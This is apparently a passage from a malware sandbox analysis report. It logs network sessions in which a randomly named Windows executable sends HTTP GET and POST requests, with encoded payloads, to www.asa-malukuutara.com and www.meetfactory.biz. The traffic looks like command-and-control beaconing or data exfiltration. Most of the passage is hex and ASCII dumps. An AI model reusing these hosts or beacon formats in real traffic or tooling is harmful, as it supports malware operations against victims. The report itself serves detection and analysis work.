                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090445042 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090655088 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090795994 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090895891 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091032982 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091109037 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091175079 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091280937 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.091356039 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.11.2049744103.247.8.5380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.307566881 CEST556OUTGET /21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:07.780873060 CEST521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:07 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Location: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.11.204974572.14.178.17480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.382955074 CEST820OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4d 67 4c 56 53 62 4e 55 74 42 64 75 63 59 56 55 51 64 49 78 42 51 42 6b 6c 55 49 78 54 36 64 66 63 34 52 30 6b 69 4c 33 67 6b 52 4f 6f 4c 64 74 71 57 6c 55 6f 77 78 43 35 49 38 46 6c 41 4f 71 41 5a 75 37 53 32 37 52 58 49 46 65 66 6e 37 42 71 47 4c 48 4b 56 4b 62 6f 30 4c 7a 33 59 41 74 68 36 56 72 63 70 55 61 6d 70 33 35 37 41 79 45 38 53 64 48 42 64 6f 4f 79 69 39 36 54 74 73 6c 51 68 49 67 77 30 68 2f 31 4e 56 35 61 68 4f 6b 7a 54 70 35 44 77 75 5a 6c 43 79 36 74 6f 74 6a 6a 56 61 62 6f 46 53 6e 6c 6d 77 71 51 4c 33 61 66 75 79 4d 6b 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.516876936 CEST803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:21 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 5f 4e b0 1b 48 27 75 63 62 42 ec 24 75 82 cd 25 23 24 c5 92 03 12 01 01 26 9d fe f7 02 ee c4 74 dc 4b 75 40 da 65 f7 ed be b7 92 f5 e1 fb 7c bc 58 dd 5e 4a 44 c4 d1 f9 91 d5 6c 52 04 d8 da 96 31 93 cf 8f a4 7a 59 04 03 b4 3b b6 66 8c 05 90 20 01 69 86 85 2d 3f 2c 26 bd e1 9f c8 fd 6f 22 44 d2 c3 af 39 2d 6c 79 db cb 41 0f f2 38 01 82 86 11 96 25 c8 99 c0 ac ce 9d 5e da 18 ad f1 41 36 03 31 b6 e5 82 e2 32 e1 a9 e8 24 94 14 09 62 23 5c 50 88 7b ad f1 59 a2 8c 0a 0a a2 5e 06 41 84 6d ad af 76 e1 04 15 11 3e b7 94 dd de d2 69 9b 64 3c 83 29 4d c4 9e d6 bf 7b 4f f1 73 8a 33 d2 69 41 3d cb d3 c8 6e f8 7d 51 94 b2 2c 4d b5 1f 63 2c 9e 01 14 3c ad fa 21 7d 53 64 49 d9 e3 5a ca 61 2d ab 95 b0 ab d1 61 9d 93 ff a8 63 29 fb 11 59 21 47 95 c4 59 c4 01 b2 65 c4 9f 76 c7 8f 9f ba b2 ec c8 4b a2 4a 6a 9d 05 de 0a 65 03 0a b0 f3 76 e2 1a 4d 9e 73 06 05 e5 4c ea 40 49 3f df 95 6c 42 9a 55 52 86 78 d9 17 3c e9 47 1c d6 93 e6 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 263SMs0WPv6_NH'ucbB$u%#$&tKu@e|X^JDlR1zY;f i-?,&o"D9-lyA8%^A612$b#\P{Y^Amv>id<)M{Os3iA=n}Q,Mc,<!}SdIZa-ac)Y!GYevKJjevMsL@I?lBURx<GOjV-{*6[;d')5SLTizH+W2X@/j2XMOik1nis9/tX ^E>^354/vLG`x4JE8rs&%tJAZAD8x- '*B:~iZz@(Hx?F:'z#|~|dI^h]rG_nYJ[JsM700


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.11.204974672.14.178.17480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.055092096 CEST840OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 31 66 64 63 56 30 6c 6a 4c 33 74 45 52 4f 67 72 64 6f 75 57 6b 35 6f 77 39 38 35 49 41 46 6c 41 79 71 41 62 6d 37 52 48 37 51 58 59 46 63 57 48 37 44 6c 6d 4c 48 4b 56 4b 62 6f 30 76 64 33 63 55 74 68 71 46 72 64 49 55 5a 36 5a 33 34 73 77 79 45 34 53 64 44 42 64 6f 38 79 67 5a 51 54 76 45 6c 51 6b 6b 67 77 41 31 38 2f 4e 55 54 58 42 50 57 79 7a 63 6e 61 6a 33 30 73 77 75 39 72 4c 52 44 76 6a 4c 42 31 33 6d 44 6d 31 73 59 55 37 4f 79 64 73 7a 58 35 76 2f 62 79 73 33 34 57 4d 54 6b 63 31 6b 43 6d 65 4c 59 42 6f 59 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqAbm7RH7QXYFcWH7DlmLHKVKbo0vd3cUthqFrdIUZ6Z34swyE4SdDBdo8ygZQTvElQkkgwA18/NUTXBPWyzcnaj30swu9rLRDvjLB13mDm1sYU7OydszX5v/bys34WMTkc1kCmeLYBoY=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:24.189296007 CEST803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:24 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 c1 72 9b 30 10 bd e7 2b 28 87 4c 3b 53 1b 30 76 31 0d a4 93 d2 98 98 10 3b 49 9d 60 fb 92 11 92 62 c9 01 89 82 00 93 4e ff bd 80 3b 31 1d f7 52 1d 90 76 d9 7d bb ef ad 64 bd fb 36 77 16 ab db 4b 89 88 38 3a 3f b1 9a 4d 8a 00 db d8 32 66 f2 f9 89 54 2f 8b 60 80 f6 c7 d6 8c b1 00 12 24 20 cd b0 b0 e5 87 c5 a4 37 fe 13 79 f8 4d 84 48 7a f8 47 4e 0b 5b de f5 72 d0 83 3c 4e 80 a0 61 84 65 09 72 26 30 ab 73 a7 97 36 46 1b 7c 94 cd 40 8c 6d b9 a0 b8 4c 78 2a 3a 09 25 45 82 d8 08 17 14 e2 5e 6b 7c 94 28 a3 82 82 a8 97 41 10 61 5b eb ab 5d 38 41 45 84 cf 2d 65 bf b7 74 da 26 19 cf 60 4a 13 71 a0 f5 ef de 53 fc 9c e2 8c 74 5a 50 cf f2 34 b2 1b 7e 9f 15 a5 2c 4b 43 ed c7 18 8b 67 00 05 4f ab 7e 48 5f 15 59 52 0e b8 96 72 5c cb 6a 25 ec 6a 74 5c 67 f4 1f 75 2c e5 30 22 2b e4 a8 92 38 8b 38 40 b6 8c f8 d3 fe f8 fe 43 57 96 3d 79 49 54 49 ad b3 c0 3b a1 6c 41 01 f6 de 4e 5c a3 c9 73 ce a0 a0 9c 49 1d 28 e9 e7 9b 92 4d 48 b3 4a ca 10 2f fb 82 27 fd 88 c3 7a d2 9c [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 263Sr0+(L;S0v1;I`bN;1Rv}d6wK8:?M2fT/`$ 7yMHzGN[r<Naer&0s6F|@mLx*:%E^k|(Aa[]8AE-et&`JqStZP4~,KCgO~H_YRr\j%jt\gu,0"+88@CW=yITI;lAN\sI(MHJ/'zIJ% T\Mbk9EfCC7jiGvH7+Oz\c~:c^zqt*K05AiV`r19rw'%twj0QA`NZND`F!5aPpkd=x(Bg#;"NdI^h}Lz,{-&W0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.11.204974772.14.178.17480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.720030069 CEST7989OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 39 66 64 70 42 30 6b 41 7a 33 73 45 52 4f 75 4c 64 70 75 57 6c 37 6f 78 56 77 35 49 4e 77 6c 46 32 71 53 70 65 37 55 30 6a 51 64 59 46 63 55 48 37 43 71 47 4b 61 4b 56 61 6c 6f 30 66 64 33 63 55 74 68 73 35 72 61 5a 55 5a 70 4a 33 35 37 41 79 49 38 53 64 37 42 5a 46 4a 79 67 64 71 53 66 6b 6c 54 45 30 67 6a 56 68 38 39 74 56 31 55 42 50 4f 79 7a 41 47 61 6a 36 59 73 78 61 58 72 4a 78 44 2b 43 2b 67 6f 79 47 5a 36 48 4d 30 58 2f 47 73 55 4e 2f 65 36 66 6e 48 36 75 54 4b 66 62 72 75 53 30 45 32 39 4d 62 62 51 63 6f 6a 31 64 62 5a 43 52 77 45 70 74 55 64 49 79 42 41 37 63 69 6f 65 6f 35 33 6d 6d 53 73 49 6d 5a 78 75 45 38 32 6c 57 2f 78 4c 31 51 4e 4b 37 6f 79 4d 33 48 74 52 65 54 67 4d 36 4c 67 49 6c 72 4d 4b 31 57 71 2f 4e 30 49 73 2b 4f 70 77 72 6b 46 49 62 70 32 42 4d 41 67 64 49 50 5a 52 56 34 59 57 37 34 75 34 6c 65 56 4d 77 44 6d 2f 4b 42 6b 4a 7a 71 61 71 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts9fdpB0kAz3sEROuLdpuWl7oxVw5INwlF2qSpe7U0jQdYFcUH7CqGKaKValo0fd3cUths5raZUZpJ357AyI8Sd7BZFJygdqSfklTE0gjVh89tV1UBPOyzAGaj6YsxaXrJxD+C+goyGZ6HM0X/GsUN/e6fnH6uTKfbruS0E29MbbQcoj1dbZCRwEptUdIyBA7cioeo53mmSsImZxuE82lW/xL1QNK7oyM3HtReTgM6LgIlrMK1Wq/N0Is+OpwrkFIbp2BMAgdIPZRV4YW74u4leVMwDm/KBkJzqaqG74IbLUolpkgTUCwOKnrS/adpIQXyeljqaDFEMrwQTeYikfKtROTerQEpnoR1KYpJ8qaSd7Of5aiGvzf69xWdRXmCs31q2B251YHLnQIqMjY1JiWPPnlastlasnx667fK3dt7o7+P15GWZxDZVT/fnsI9yhVoJWyXnx8bT3ApNIchpDktIR25AuswbGGfPA0GYxMwpZsiMv3HeVDjRIkTvhtdtqXFAbax51QEw0+0dVQ3bzkRCCsC3w9axFbkyC3v7ijrYeSF7S5GSnRMG+9XmvQPHkw3zZ3c12fM4urklbX/v7GyNDdJHg2LLfnwo1yy20OQFfP6p/a4vM5BCUwTJL35Iry96kCT6JeWvKXwYBgYudGAl2PP9y6daFXsKd1OaWZOSUvN89VPCBM00ppMAzVLqXWMsrfY4TmBkkBkl5j9RzXXZx7jb3ZwwEhefUyMtKEtX1AOB73AAioltSjH9zdo1KMpb+qsmFzDGB9TY3dpisAglMA1dNZnu/zaFqXZyXSI8oIL7sK3ayVQVLW6tfhnObETNYI8cwhSGKb+5rWvmphdTCg6xG2h+AZDniRhtihmMsSEE44wEBcECyhgQmp7TM8UrGJo1ETFqYkJRw4Vb3cdA2qa3OaoJI1JB5R8+oQfJbdYEbJjYwiRz3xYg1QyjsUp1olp+ [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:26.854825020 CEST804INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:36:26 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 cb b1 b1 1b 48 27 a5 31 b1 43 ec 24 75 82 cd 25 23 24 c5 92 03 12 05 01 26 9d fe f7 02 ee c4 74 dc 4b 75 40 da 65 f7 ed be b7 92 f5 fe db c2 59 ae 6f 2f 25 22 e2 e8 fc 9d d5 6c 52 04 d8 c6 96 31 93 cf df 49 f5 b2 08 06 68 7f 6c cd 18 0b 20 41 02 d2 0c 0b 5b 7e 58 4e 7a a3 3f 91 87 df 44 88 a4 87 7f e4 b4 b0 e5 5d 2f 07 3d c8 e3 04 08 1a 46 58 96 20 67 02 b3 3a 77 7a 69 63 b4 c1 47 d9 0c c4 d8 96 0b 8a cb 84 a7 a2 93 50 52 24 88 8d 70 41 21 ee b5 c6 27 89 32 2a 28 88 7a 19 04 11 b6 75 45 eb c2 09 2a 22 7c 6e a9 fb bd a5 d3 36 c9 78 06 53 9a 88 03 ad 7f f7 9e e2 e7 14 67 a4 d3 82 76 96 a7 91 dd f0 fb ac aa 65 59 9a 9a 12 63 2c 9e 01 14 3c ad 94 90 be aa b2 a4 1e 70 2d f5 b8 96 d5 4a d8 d5 e8 b8 ce e0 3f ea 58 ea 61 44 56 c8 51 25 71 16 71 80 6c 19 f1 a7 fd f1 c3 c7 ae 2c 7b f2 92 a8 92 5a 67 81 77 42 dd 82 02 ec bd 9d b8 46 93 e7 9c 41 41 39 93 3a 50 d2 cf 37 25 9b 90 66 95 94 21 5e 2a 82 27 4a c4 61 3d 69 ce [TRUNCATED]
